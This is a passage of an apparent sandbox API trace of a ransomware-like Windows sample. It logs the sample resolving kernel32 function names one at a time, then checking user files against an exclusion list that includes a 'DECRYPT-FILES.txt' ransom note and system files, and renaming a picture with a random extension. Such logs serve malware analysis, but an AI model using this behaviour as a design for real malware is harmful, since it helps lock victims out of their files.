(in: lpString1=0x3f2d1ec, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0086.472] lstrlenA (lpString="CREATEFILEW") returned 11 [0086.472] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0086.472] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0086.472] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0086.472] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0086.472] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0086.472] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0086.472] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0086.472] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0086.472] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0086.473] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0086.473] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0086.473] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0086.473] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0086.473] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0086.473] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0086.473] lstrlenA (lpString="CREATEJOBSET") returned 12 [0086.473] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0086.473] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0086.473] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0086.473] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0086.473] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0086.473] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0086.473] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0086.473] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0086.473] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0086.473] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0086.473] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0086.473] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0086.473] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0086.473] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0086.473] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0086.473] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0086.473] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0086.473] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0086.473] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0086.473] lstrlenA (lpString="CREATEPIPE") returned 10 [0086.473] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0086.473] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0086.473] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0086.473] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0086.473] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0086.473] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0086.473] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0086.473] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0086.473] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0086.474] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0086.474] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0086.474] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0086.474] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0086.474] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0086.474] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0086.474] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0086.474] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0086.474] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0086.474] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0086.474] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0086.474] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0086.474] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0086.474] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0086.474] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0086.474] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0086.474] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0086.474] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0086.474] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0086.474] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0086.474] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0086.474] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0086.474] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0086.474] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0086.474] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0086.474] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0086.474] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0086.474] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0086.474] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0086.474] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0086.474] lstrlenA (lpString="CREATETHREAD") returned 12 [0086.474] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0086.474] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0086.474] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0086.474] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0086.474] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0086.474] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0086.475] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0086.475] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0086.475] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0086.475] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0086.475] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0086.475] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0086.475] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0086.475] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0086.475] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0086.475] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0086.475] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0086.475] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0086.475] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0086.475] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0086.475] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0086.475] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0086.475] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0086.475] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0086.475] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0086.475] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0086.475] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0086.475] lstrlenA (lpString="CTRLROUTINE") returned 11 [0086.475] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0086.475] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0086.475] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0086.475] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0086.475] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0086.475] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0086.475] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0086.475] lstrlenA (lpString="DEBUGBREAK") returned 10 [0086.475] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0086.475] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0086.475] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0086.475] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0086.475] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0086.475] lstrlenA (lpString="DECODEPOINTER") returned 13 [0086.476] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0086.476] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0086.476] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0086.476] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0086.476] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0086.476] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0086.476] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0086.476] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0086.476] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0086.476] lstrlenA (lpString="DELETEATOM") returned 10 [0086.476] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0086.476] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0086.476] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0086.476] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0086.476] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0086.476] lstrlenA (lpString="DELETEFIBER") returned 11 [0086.476] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0086.476] lstrlenA (lpString="DELETEFILEA") returned 11 [0086.476] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0086.476] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0086.476] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0086.476] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0086.476] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0086.476] lstrlenA (lpString="DELETEFILEW") returned 11 [0086.476] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0086.476] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0086.476] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0086.476] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0086.476] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0086.476] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0086.476] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0086.476] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0086.476] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0086.476] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0086.476] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0086.476] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0086.477] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0086.477] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0086.477] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0086.477] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0086.477] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0086.477] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0086.477] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0086.477] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0086.477] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0086.477] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0086.477] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0086.477] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0086.477] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0086.477] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0086.477] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0086.477] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0086.477] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0086.477] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0086.477] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0086.477] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0086.477] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0086.477] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0086.477] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0086.477] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0086.477] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0086.477] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0086.477] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0086.477] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0086.477] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0086.477] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0086.477] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0086.477] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0086.477] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0086.477] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0086.477] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0086.478] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0086.478] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0086.478] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0086.478] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0086.478] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0086.478] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0086.478] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0086.478] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0086.478] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0086.478] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0086.478] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0086.478] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0086.478] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0086.478] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0086.478] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0086.478] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0086.478] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0086.478] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0086.478] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0086.478] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0086.478] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0086.478] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\MiKHLksvTxyN7KMU5.png") returned 66 [0086.478] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\MiKHLksvTxyN7KMU5.png.T135Gjq") returned 74 [0086.478] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\MiKHLksvTxyN7KMU5.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ntwgr\\mikhlksvtxyn7kmu5.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\MiKHLksvTxyN7KMU5.png.T135Gjq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ntwgr\\mikhlksvtxyn7kmu5.png.t135gjq"), dwFlags=0x0) returned 1 [0086.479] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.479] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.480] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.480] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8d163a70, ftCreationTime.dwHighDateTime=0x1d4d25e, ftLastAccessTime.dwLowDateTime=0xf342eda0, ftLastAccessTime.dwHighDateTime=0x1d4c9aa, ftLastWriteTime.dwLowDateTime=0xf342eda0, ftLastWriteTime.dwHighDateTime=0x1d4c9aa, nFileSizeHigh=0x0, nFileSizeLow=0xc757, dwReserved0=0x0, dwReserved1=0x0, cFileName="ScBBHmEAV.gif", cAlternateFileName="SCBBHM~1.GIF")) returned 1 [0086.480] lstrcmpiW (lpString1="ScBBHmEAV.gif", lpString2="DECRYPT-FILES.txt") returned 1 [0086.480] lstrcmpiW (lpString1="ScBBHmEAV.gif", lpString2="autorun.inf") returned 1 [0086.480] lstrcmpiW (lpString1="ScBBHmEAV.gif", lpString2="boot.ini") returned 1 [0086.480] lstrcmpiW (lpString1="ScBBHmEAV.gif", lpString2="desktop.ini") returned 1 [0086.480] lstrcmpiW (lpString1="ScBBHmEAV.gif", lpString2="ntuser.dat") returned 1 [0086.480] lstrcmpiW (lpString1="ScBBHmEAV.gif", lpString2="iconcache.db") returned 1 [0086.480] lstrcmpiW (lpString1="ScBBHmEAV.gif", lpString2="bootsect.bak") returned 1 [0086.480] lstrcmpiW (lpString1="ScBBHmEAV.gif", lpString2="ntuser.dat.log") returned 1 [0086.480] lstrcmpiW (lpString1="ScBBHmEAV.gif", lpString2="thumbs.db") returned -1 [0086.480] lstrcmpiW (lpString1="ScBBHmEAV.gif", lpString2="Bootfont.bin") returned 1 [0086.480] lstrlenW (lpString="ScBBHmEAV.gif") returned 13 [0086.480] lstrcmpiW (lpString1="gif", lpString2="lnk") returned -1 [0086.480] lstrcmpiW (lpString1="gif", lpString2="exe") returned 1 [0086.480] lstrcmpiW (lpString1="gif", lpString2="sys") returned -1 [0086.480] lstrcmpiW (lpString1="gif", lpString2="dll") returned 1 [0086.480] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\") returned 45 [0086.480] lstrlenW (lpString="ScBBHmEAV.gif") returned 13 [0086.480] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\" [0086.480] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\", lpString2="ScBBHmEAV.gif" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\ScBBHmEAV.gif") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\ScBBHmEAV.gif" [0086.480] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0086.481] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS 